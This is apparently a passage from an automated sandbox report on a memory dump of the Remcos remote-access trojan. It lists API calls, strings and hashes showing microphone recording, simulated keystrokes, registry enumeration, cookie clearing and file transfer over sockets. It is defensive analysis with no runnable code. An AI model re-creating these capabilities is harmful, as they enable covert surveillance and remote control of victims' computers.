                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                      • API String ID: 3809562944-243156785
                                      • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                      • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                      • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                      • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                      • int.LIBCPMT ref: 00410E81
                                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                      • __Init_thread_footer.LIBCMT ref: 00410F29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID: ,kG$0kG
                                      • API String ID: 3815856325-2015055088
                                      • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                      • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                      • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                      • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                      • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                      • waveInStart.WINMM ref: 00401CFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      • String ID: dMG$|MG$PG
                                      • API String ID: 1356121797-532278878
                                      • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                      • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                      • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                      • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                        • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                        • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                        • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                      • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                      • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                      • TranslateMessage.USER32(?), ref: 0041D4E9
                                      • DispatchMessageA.USER32(?), ref: 0041D4F3
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                      • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                      • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                      • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                      • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                      • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                      • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • _memcmp.LIBVCRUNTIME ref: 00445423
                                      • _free.LIBCMT ref: 00445494
                                      • _free.LIBCMT ref: 004454AD
                                      • _free.LIBCMT ref: 004454DF
                                      • _free.LIBCMT ref: 004454E8
                                      • _free.LIBCMT ref: 004454F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                      • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                      • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                      • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                      • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                      • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                      • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                      • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                      • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                        • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                      • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                      • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                      • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                        • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                        • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID: t^F
                                      • API String ID: 3950776272-389975521
                                      • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                      • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                      • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                      • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004018BE
                                      • ExitThread.KERNEL32 ref: 004018F6
                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                      • String ID: PkG$XMG$NG$NG
                                      • API String ID: 1649129571-3151166067
                                      • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                      • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                      • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                      • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                        • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                        • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                      • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                      • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                      • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                      • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                      • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                      • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm$zD
                                      • API String ID: 2936374016-2723203690
                                      • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                      • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                      • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                      • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]$xUG$TG
                                      • API String ID: 3554306468-1165877943
                                      • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                      • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                      • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                      • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: D[E$D[E
                                      • API String ID: 269201875-3695742444
                                      • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                      • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                      • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                      • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                        • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                        • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumInfoOpenQuerysend
                                      • String ID: xUG$NG$NG$TG
                                      • API String ID: 3114080316-2811732169
                                      • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                      • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                      • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                      • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                      • __alloca_probe_16.LIBCMT ref: 004511B1
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                      • __freea.LIBCMT ref: 0045121D
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID: PkGNG
                                      • API String ID: 313313983-263838557
                                      • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                      • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                      • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                      • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                        • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                        • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • _wcslen.LIBCMT ref: 0041B763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                      • API String ID: 37874593-122982132
                                      • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                      • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                      • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                      • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                        • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                        • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                      • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                      • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                      • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                      • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                      • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                      • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                      • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                      • _free.LIBCMT ref: 00450F48
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00450F53
                                      • _free.LIBCMT ref: 00450F5E
                                      • _free.LIBCMT ref: 00450FB2
                                      • _free.LIBCMT ref: 00450FBD
                                      • _free.LIBCMT ref: 00450FC8
                                      • _free.LIBCMT ref: 00450FD3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                      • int.LIBCPMT ref: 00411183
                                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 004111C3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
